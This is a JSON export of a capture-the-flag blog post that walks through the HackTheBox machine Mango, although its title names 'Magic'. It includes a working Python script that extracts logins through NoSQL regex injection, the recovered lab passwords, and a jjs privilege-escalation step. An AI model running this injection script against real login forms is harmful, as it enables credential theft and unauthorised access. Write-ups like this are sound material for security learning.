{"id":20,"date":"2020-04-27T11:47:45","date_gmt":"2020-04-27T11:47:45","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=20"},"modified":"2020-05-09T11:06:12","modified_gmt":"2020-05-09T11:06:12","slug":"hackthebox-magic-walkthrough","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/hackthebox-magic-walkthrough\/","title":{"rendered":"HackTheBox : Magic Walkthrough"},"content":{"rendered":"\n<p>Hello everyone!!<\/p>\n\n\n\n<p>This is Shreya Pohekar. AndToday, we are doing Mango from hackthebox. Its an easy Linux box that mainly focuses on <strong>NoSQL injection<\/strong> to get the initial foothold and privilege escalation via a java command-line tool <strong>(jjs<\/strong>) to interpret javascript.<\/p>\n\n\n\n<p>So lets get started.<\/p>\n\n\n\n<p>A simple nmap scan resulted in few open ports such as ssh, http and https<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># nmap -sC -sV -o mangoscan.nmap 10.10.10.162<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/Y-fUv8SqPoYElyAenhBWXIHTsyjJsMtDZeiGI1-_8_9bgGF3KL2YjD_3MVcyrWy3k-tVuuGMgKgKOHxJRqa0kuRJVp9XLg58Y1PYOyeNpS9WH09x6q9blnScGZOgksQZ2yWpdBEM\" alt=\"\"\/><\/figure>\n\n\n\n<p>The CN was obtained under the nmap results&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/DKnaxS3I8r862NDRF4TvWYNBRYTzCbIGgDgXRKqsPKZuaLH6k8II9QDljJVcKN4t4k59KNwEx66ZuVOKd7pcZdB1D9vs_h0bARWMSJqBmkJBwHf4iaur3XfXaMOFqmw_eGAByhMu\" alt=\"\"\/><\/figure>\n\n\n\n<p>We have to do this entry in \/etc\/hosts<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow\">\n<pre class=\"wp-block-preformatted wpf-blue-background\"># vim \/etc\/hosts<\/pre>\n\n\n\n<ul class=\"wp-block-list\"><li>10.10.10.162 staging-order.mango.htb<\/li><\/ul>\n<\/div><\/div>\n\n\n\n<p>Access to <a href=\"http:\/\/10.10.10.162\">http:\/\/10.10.10.162<\/a> was forbidden so I tried <a href=\"https:\/\/10.10.10.162\">https:\/\/10.10.10.162<\/a> and a page loaded that looked similar to the google search engine page.<\/p>\n\n\n\n<p>I ran a gobuster scan with -k switch to skip the ssl certificates verification for https websites.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># gobuster -u https:\/\/10.10.10.162 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -t 50 -k<\/pre>\n\n\n\n<p>Alongside, I went to <a href=\"https:\/\/staging-order.mango.htb\">https:\/\/staging-order.mango.htb<\/a> and got a <strong>login page<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/rKCqt0K1Wj8FX9HfADNR1j_lsanteE16Zl8Bz9iSAhioTnDOn-HG4D-nNWg6kXNBUwouLOmCa47x4z0MUjLIDu1-QYRFMe-f1vQvPSP34jZn1-t82_Mx7EWpiT-kTu2Aom6ykOZG\" alt=\"\"\/><\/figure>\n\n\n\n<p>I tried up different username-password combination but nothing worked out. The page was generating 200&nbsp; OK response for every request made. So i intercepted the request through burp and after a bit of digging, I found out that there was nosql injection vulnerability on the form.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/O5HFwW17ZFQ97akAjmfEFajd8y2-Lig8GW_sZ4p6Lj9cOOxgTFW5-49XTNGbpBmIzqG49dgoM_UGINe4sra1Lk2AzbSlTRdfGnCickqTfILRjjWij8N4aeHh3y_IUptV0Qq22pLj\" alt=\"\"\/><\/figure>\n\n\n\n<p>(credits : <a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/nosql-injection\">https:\/\/book.hacktricks.xyz\/pentesting-web\/nosql-injection<\/a>)<\/p>\n\n\n\n<p>Using the above payload, the response obtained in the burp was 302 found<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/Ftq3h1jl7vpLl_8Et0WyOYkcObDQUm2LzViulkzOLdCGA0r94hjOo89BrlMU25l7PLQ47uwU33D-MVWmXaZZtGEeOu_v_6xRNliz9lsHe2rVUHvOT8PR2PlePPaPOnSDhl99xYSg\" alt=\"\"\/><\/figure>\n\n\n\n<p>I realized that by using the<strong> regex parameter<\/strong>, the username and the passwords can be retrieved, detecting one character per request.<\/p>\n\n\n\n<p style=\"color:#1f1e1e\" class=\"has-text-color has-drop-cap\">I grabbed a script from <a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/nosql-injection\">hacktricks<\/a> performing the same steps.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import requests\nimport string\n\nurl = \"http:\/\/staging-order.mango.htb\"\nheaders = {\"Host\": \"staging-order.mango.htb\"}\ncookies = {\"PHPSESSID\": \"8m928e8vlmg8de7bl7vr9fpndk\"}\npossible_chars = list(string.ascii_letters) + list(string.digits) + &#91;\"\\\\\"+c for c in string.punctuation+string.whitespace ]\ndef get_password(username):\n\tprint(\"Extracting password of \"+username)\n\tparams = {\"username\":username, \"password&#91;$regex]\":\"\", \"login\": \"login\"}\n\tpassword = \"^\"\n\twhile True:\n    \tfor c in possible_chars:\n        \tparams&#91;\"password&#91;$regex]\"] = password + c + \".*\"\n        \tpr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)\n        \tif int(pr.status_code) == 302:\n            \tpassword += c\n            \tbreak\n    \tif c == possible_chars&#91;-1]:\n        \tprint(\"Found password \"+password&#91;1:].replace(\"\\\\\", \"\")+\" for username \"+username)\n        \treturn password&#91;1:].replace(\"\\\\\", \"\")\n\ndef get_usernames():\n\tusernames = &#91;]\n\tparams = {\"username&#91;$regex]\":\"\", \"password&#91;$regex]\":\".*\", \"login\": \"login\"}\n\tfor c in possible_chars:\n    \tusername = \"^\" + c\n    \tparams&#91;\"username&#91;$regex]\"] = username + \".*\"\n    \tpr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)\n    \tif int(pr.status_code) == 302:\n        \tprint(\"Found username starting with \"+c)\n        \twhile True:\n            \tfor c2 in possible_chars:\n                \tparams&#91;\"username&#91;$regex]\"] = username + c2 + \".*\"\n                \tif int(requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False).status_code) == 302:\n                    \tusername += c2\n                    \tprint(username)\n                    \tbreak\n\n            \tif c2 == possible_chars&#91;-1]:\n                \tprint(\"Found username: \"+username&#91;1:])\n                \tusernames.append(username&#91;1:])\n                \tbreak\n\treturn usernames\n\n\nfor u in get_usernames():\n\tget_password(u)\n<\/code><\/pre>\n\n\n\n<p>The script enumerated users as admin and mango and their passwords to be<strong> t9KcS3>!0B#2 and h3mXK8RhU~f{]f5H<\/strong> respectively.\u00a0<\/p>\n\n\n\n<p>I did ssh with the creds of mango<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># ssh mango@10.10.10.162&nbsp;<\/pre>\n\n\n\n<p>Then did a switch user to admin and got a sh shell<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/oy9GbWvRPxUS8XpEvjg2LJamS6XDv3nHGtzlvZZPfDml3zTl8YwddMaW-FqSsq_PVc0uRB2ntS8mbEE-BZ3ezPbUmDVqFHco8XaUPkUOs_3m-mMy0vLCQPUy-DhbdycleMn3c5So\" alt=\"\"\/><\/figure>\n\n\n\n<p>Got the user.txt .<\/p>\n\n\n\n<p>Command ls -la listed a file .jjs.history that seemed to be an interesting file. So I found out its location<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/sxIsj_A_2UidhQXbBXsknQ5kA4g5MGJA3if-WhKi3L5DZc4ibieWlVS4NNwx39d4RiU-Rt5GJjVH8ooPAnXPODykMql7O_OHeHnGremj3QgCf56I6GSa7PuMSUXN3sSDi-L7G4Le\" alt=\"\"\/><\/figure>\n\n\n\n<p>To my interest, the binary was running as root and can lead to privilege escalation.<\/p>\n\n\n\n<p>Upon googling a bit, I found out that priv esc was possible with jjs<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/ryDWOyINU8H6B9fAvb8_QZxn14nNc7iPqUvkhG9jWZ3t1sMTbrK7gJVhmD4FhU6UnGHhdHL4vpMH7b1EKBumos7pLlp8BT4NFY_04mcEffr99p20hhhH_arpS7UtyXn_kSfLpdUW\" alt=\"\"\/><\/figure>\n\n\n\n<p>I used the<strong> file read<\/strong> functionality, that can read any file with privileged rights. In the code, I directly inserted the path to root.txt and upon successful execution got the root flag.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/sGub4IJ114EVjXo2pWg8nBP_b1D5ucwy0C6R75o4ULPz3JzjpO5IEUHWoRBrmcM8_sztDjGFdFppkeKFc_lwsUlfWTRkl73DWB-fU8qKIV3rqXohaKMIulHL8mLE7PH-zVHz0qcE\" alt=\"\"\/><\/figure>\n\n\n\n<p>&nbsp;That\u2019s all for this blog post. Hope you enjoyed reading and learned something out of it.<\/p>\n\n\n\n<p>For more such content subscribe to my page! <br>\nUntil then, Happy Hunting!!!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>An easy machine from HacktheBox. Let&#8217;s grab the root flag&#8230;..<\/p>\n","protected":false},"author":1,"featured_media":21,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[19,2],"tags":[26,29,31,27,28,30],"class_list":["post-20","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-information-security","tag-hackthebox","tag-jjs-exploit","tag-jjs-gtfobins","tag-mango-hackthebox","tag-mango-walkthrough","tag-nosql-injection","entry","has-media"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 4.9.9 - aioseo.com -->\n\t<meta name=\"description\" content=\"An easy machine from HacktheBox. Let&#039;s grab the root flag.....\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"shreyapohekar\"\/>\n\t<meta name=\"google-site-verification\" content=\"y_3exmP-yXmpf_8pYjWbkeaT2VJmyungNEKJyiRmxL8\" \/>\n\t<link rel=\"canonical\" href=\"https:\/\/shreyapohekar.com\/blogs\/hackthebox-magic-walkthrough\/\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 4.9.9\" \/>\n\t\t<meta property=\"og:locale\" content=\"en_US\" \/>\n\t\t<meta property=\"og:site_name\" content=\"Geek Girl | What I learn is what I BLOG!\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"HackTheBox : Magic Walkthrough | Geek Girl\" \/>\n\t\t<meta property=\"og:description\" content=\"An easy machine from HacktheBox. Let&#039;s grab the root flag.....\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/shreyapohekar.com\/blogs\/hackthebox-magic-walkthrough\/\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2021\/04\/logo.png\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2021\/04\/logo.png\" \/>\n\t\t<meta property=\"og:image:width\" content=\"500\" \/>\n\t\t<meta property=\"og:image:height\" content=\"500\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2020-04-27T11:47:45+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2020-05-09T11:06:12+00:00\" \/>\n\t\t<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n\t\t<meta name=\"twitter:site\" content=\"@shreyapohekar\" \/>\n\t\t<meta name=\"twitter:title\" content=\"HackTheBox : Magic Walkthrough | Geek Girl\" \/>\n\t\t<meta name=\"twitter:description\" content=\"An easy machine from HacktheBox. Let&#039;s grab the root flag.....\" \/>\n\t\t<meta name=\"twitter:creator\" content=\"@shreyapohekar\" \/>\n\t\t<meta name=\"twitter:image\" content=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2021\/04\/logo.png\" \/>\n\t\t<script type=\"application\/ld+json\" class=\"aioseo-schema\">\n\t\t\t{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"BlogPosting\",\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/hackthebox-magic-walkthrough\\\/#blogposting\",\"name\":\"HackTheBox : Magic Walkthrough | Geek Girl\",\"headline\":\"HackTheBox : Magic Walkthrough\",\"author\":{\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/author\\\/shreyapohekar\\\/#author\"},\"publisher\":{\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/#person\"},\"image\":{\"@type\":\"ImageObject\",\"url\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/wp-content\\\/uploads\\\/2020\\\/04\\\/Untitled-1.png\",\"width\":819,\"height\":460},\"datePublished\":\"2020-04-27T11:47:45+00:00\",\"dateModified\":\"2020-05-09T11:06:12+00:00\",\"inLanguage\":\"en-US\",\"commentCount\":1,\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/hackthebox-magic-walkthrough\\\/#webpage\"},\"isPartOf\":{\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/hackthebox-magic-walkthrough\\\/#webpage\"},\"articleSection\":\"HackTheBox, Information Security, hackthebox, jjs exploit, jjs gtfobins, mango hackthebox, mango walkthrough, nosql injection\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/hackthebox-magic-walkthrough\\\/#breadcrumblist\",\"itemListElement\":[{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs#listItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\",\"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/category\\\/information-security\\\/#listItem\",\"name\":\"Information Security\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/category\\\/information-security\\\/#listItem\",\"position\":2,\"name\":\"Information Security\",\"item\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/category\\\/information-security\\\/\",\"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/category\\\/information-security\\\/hackthebox\\\/#listItem\",\"name\":\"HackTheBox\"},\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs#listItem\",\"name\":\"Home\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/category\\\/information-security\\\/hackthebox\\\/#listItem\",\"position\":3,\"name\":\"HackTheBox\",\"item\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/category\\\/information-security\\\/hackthebox\\\/\",\"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/hackthebox-magic-walkthrough\\\/#listItem\",\"name\":\"HackTheBox : Magic Walkthrough\"},\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/category\\\/information-security\\\/#listItem\",\"name\":\"Information Security\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/hackthebox-magic-walkthrough\\\/#listItem\",\"position\":4,\"name\":\"HackTheBox : Magic Walkthrough\",\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/category\\\/information-security\\\/hackthebox\\\/#listItem\",\"name\":\"HackTheBox\"}}]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/#person\",\"name\":\"shreyapohekar\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/hackthebox-magic-walkthrough\\\/#personImage\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/166952c6ef739064bc03c48b2ee9e49d?s=96&d=wavatar&r=g\",\"width\":96,\"height\":96,\"caption\":\"shreyapohekar\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/author\\\/shreyapohekar\\\/#author\",\"url\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/author\\\/shreyapohekar\\\/\",\"name\":\"shreyapohekar\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/hackthebox-magic-walkthrough\\\/#authorImage\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/166952c6ef739064bc03c48b2ee9e49d?s=96&d=wavatar&r=g\",\"width\":96,\"height\":96,\"caption\":\"shreyapohekar\"}},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/hackthebox-magic-walkthrough\\\/#webpage\",\"url\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/hackthebox-magic-walkthrough\\\/\",\"name\":\"HackTheBox : Magic Walkthrough | Geek Girl\",\"description\":\"An easy machine from HacktheBox. Let's grab the root flag.....\",\"inLanguage\":\"en-US\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/#website\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/hackthebox-magic-walkthrough\\\/#breadcrumblist\"},\"author\":{\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/author\\\/shreyapohekar\\\/#author\"},\"creator\":{\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/author\\\/shreyapohekar\\\/#author\"},\"image\":{\"@type\":\"ImageObject\",\"url\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/wp-content\\\/uploads\\\/2020\\\/04\\\/Untitled-1.png\",\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/hackthebox-magic-walkthrough\\\/#mainImage\",\"width\":819,\"height\":460},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/hackthebox-magic-walkthrough\\\/#mainImage\"},\"datePublished\":\"2020-04-27T11:47:45+00:00\",\"dateModified\":\"2020-05-09T11:06:12+00:00\"},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/#website\",\"url\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/\",\"name\":\"Geek Girl\",\"description\":\"What I learn is what I BLOG!\",\"inLanguage\":\"en-US\",\"publisher\":{\"@id\":\"https:\\\/\\\/shreyapohekar.com\\\/blogs\\\/#person\"}}]}\n\t\t<\/script>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"HackTheBox : Magic Walkthrough | Geek Girl","description":"An easy machine from HacktheBox. Let's grab the root flag.....","canonical_url":"https:\/\/shreyapohekar.com\/blogs\/hackthebox-magic-walkthrough\/","robots":"max-image-preview:large","keywords":"","webmasterTools":{"google-site-verification":"y_3exmP-yXmpf_8pYjWbkeaT2VJmyungNEKJyiRmxL8","miscellaneous":""},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"BlogPosting","@id":"https:\/\/shreyapohekar.com\/blogs\/hackthebox-magic-walkthrough\/#blogposting","name":"HackTheBox : Magic Walkthrough | Geek Girl","headline":"HackTheBox : Magic Walkthrough","author":{"@id":"https:\/\/shreyapohekar.com\/blogs\/author\/shreyapohekar\/#author"},"publisher":{"@id":"https:\/\/shreyapohekar.com\/blogs\/#person"},"image":{"@type":"ImageObject","url":"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2020\/04\/Untitled-1.png","width":819,"height":460},"datePublished":"2020-04-27T11:47:45+00:00","dateModified":"2020-05-09T11:06:12+00:00","inLanguage":"en-US","commentCount":1,"mainEntityOfPage":{"@id":"https:\/\/shreyapohekar.com\/blogs\/hackthebox-magic-walkthrough\/#webpage"},"isPartOf":{"@id":"https:\/\/shreyapohekar.com\/blogs\/hackthebox-magic-walkthrough\/#webpage"},"articleSection":"HackTheBox, Information Security, hackthebox, jjs exploit, jjs gtfobins, mango hackthebox, mango walkthrough, nosql injection"},{"@type":"BreadcrumbList","@id":"https:\/\/shreyapohekar.com\/blogs\/hackthebox-magic-walkthrough\/#breadcrumblist","itemListElement":[{"@type":"ListItem","@id":"https:\/\/shreyapohekar.com\/blogs#listItem","position":1,"name":"Home","item":"https:\/\/shreyapohekar.com\/blogs","nextItem":{"@type":"ListItem","@id":"https:\/\/shreyapohekar.com\/blogs\/category\/information-security\/#listItem","name":"Information Security"}},{"@type":"ListItem","@id":"https:\/\/shreyapohekar.com\/blogs\/category\/information-security\/#listItem","position":2,"name":"Information Security","item":"https:\/\/shreyapohekar.com\/blogs\/category\/information-security\/","nextItem":{"@type":"ListItem","@id":"https:\/\/shreyapohekar.com\/blogs\/category\/information-security\/hackthebox\/#listItem","name":"HackTheBox"},"previousItem":{"@type":"ListItem","@id":"https:\/\/shreyapohekar.com\/blogs#listItem","name":"Home"}},{"@type":"ListItem","@id":"https:\/\/shreyapohekar.com\/blogs\/category\/information-security\/hackthebox\/#listItem","position":3,"name":"HackTheBox","item":"https:\/\/shreyapohekar.com\/blogs\/category\/information-security\/hackthebox\/","nextItem":{"@type":"ListItem","@id":"https:\/\/shreyapohekar.com\/blogs\/hackthebox-magic-walkthrough\/#listItem","name":"HackTheBox : Magic Walkthrough"},"previousItem":{"@type":"ListItem","@id":"https:\/\/shreyapohekar.com\/blogs\/category\/information-security\/#listItem","name":"Information Security"}},{"@type":"ListItem","@id":"https:\/\/shreyapohekar.com\/blogs\/hackthebox-magic-walkthrough\/#listItem","position":4,"name":"HackTheBox : Magic Walkthrough","previousItem":{"@type":"ListItem","@id":"https:\/\/shreyapohekar.com\/blogs\/category\/information-security\/hackthebox\/#listItem","name":"HackTheBox"}}]},{"@type":"Person","@id":"https:\/\/shreyapohekar.com\/blogs\/#person","name":"shreyapohekar","image":{"@type":"ImageObject","@id":"https:\/\/shreyapohekar.com\/blogs\/hackthebox-magic-walkthrough\/#personImage","url":"https:\/\/secure.gravatar.com\/avatar\/166952c6ef739064bc03c48b2ee9e49d?s=96&d=wavatar&r=g","width":96,"height":96,"caption":"shreyapohekar"}},{"@type":"Person","@id":"https:\/\/shreyapohekar.com\/blogs\/author\/shreyapohekar\/#author","url":"https:\/\/shreyapohekar.com\/blogs\/author\/shreyapohekar\/","name":"shreyapohekar","image":{"@type":"ImageObject","@id":"https:\/\/shreyapohekar.com\/blogs\/hackthebox-magic-walkthrough\/#authorImage","url":"https:\/\/secure.gravatar.com\/avatar\/166952c6ef739064bc03c48b2ee9e49d?s=96&d=wavatar&r=g","width":96,"height":96,"caption":"shreyapohekar"}},{"@type":"WebPage","@id":"https:\/\/shreyapohekar.com\/blogs\/hackthebox-magic-walkthrough\/#webpage","url":"https:\/\/shreyapohekar.com\/blogs\/hackthebox-magic-walkthrough\/","name":"HackTheBox : Magic Walkthrough | Geek Girl","description":"An easy machine from HacktheBox. Let's grab the root flag.....","inLanguage":"en-US","isPartOf":{"@id":"https:\/\/shreyapohekar.com\/blogs\/#website"},"breadcrumb":{"@id":"https:\/\/shreyapohekar.com\/blogs\/hackthebox-magic-walkthrough\/#breadcrumblist"},"author":{"@id":"https:\/\/shreyapohekar.com\/blogs\/author\/shreyapohekar\/#author"},"creator":{"@id":"https:\/\/shreyapohekar.com\/blogs\/author\/shreyapohekar\/#author"},"image":{"@type":"ImageObject","url":"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2020\/04\/Untitled-1.png","@id":"https:\/\/shreyapohekar.com\/blogs\/hackthebox-magic-walkthrough\/#mainImage","width":819,"height":460},"primaryImageOfPage":{"@id":"https:\/\/shreyapohekar.com\/blogs\/hackthebox-magic-walkthrough\/#mainImage"},"datePublished":"2020-04-27T11:47:45+00:00","dateModified":"2020-05-09T11:06:12+00:00"},{"@type":"WebSite","@id":"https:\/\/shreyapohekar.com\/blogs\/#website","url":"https:\/\/shreyapohekar.com\/blogs\/","name":"Geek Girl","description":"What I learn is what I BLOG!","inLanguage":"en-US","publisher":{"@id":"https:\/\/shreyapohekar.com\/blogs\/#person"}}]},"og:locale":"en_US","og:site_name":"Geek Girl | What I learn is what I BLOG!","og:type":"article","og:title":"HackTheBox : Magic Walkthrough | Geek Girl","og:description":"An easy machine from HacktheBox. Let's grab the root flag.....","og:url":"https:\/\/shreyapohekar.com\/blogs\/hackthebox-magic-walkthrough\/","og:image":"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2021\/04\/logo.png","og:image:secure_url":"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2021\/04\/logo.png","og:image:width":500,"og:image:height":500,"article:published_time":"2020-04-27T11:47:45+00:00","article:modified_time":"2020-05-09T11:06:12+00:00","twitter:card":"summary_large_image","twitter:site":"@shreyapohekar","twitter:title":"HackTheBox : Magic Walkthrough | Geek Girl","twitter:description":"An easy machine from HacktheBox. Let's grab the root 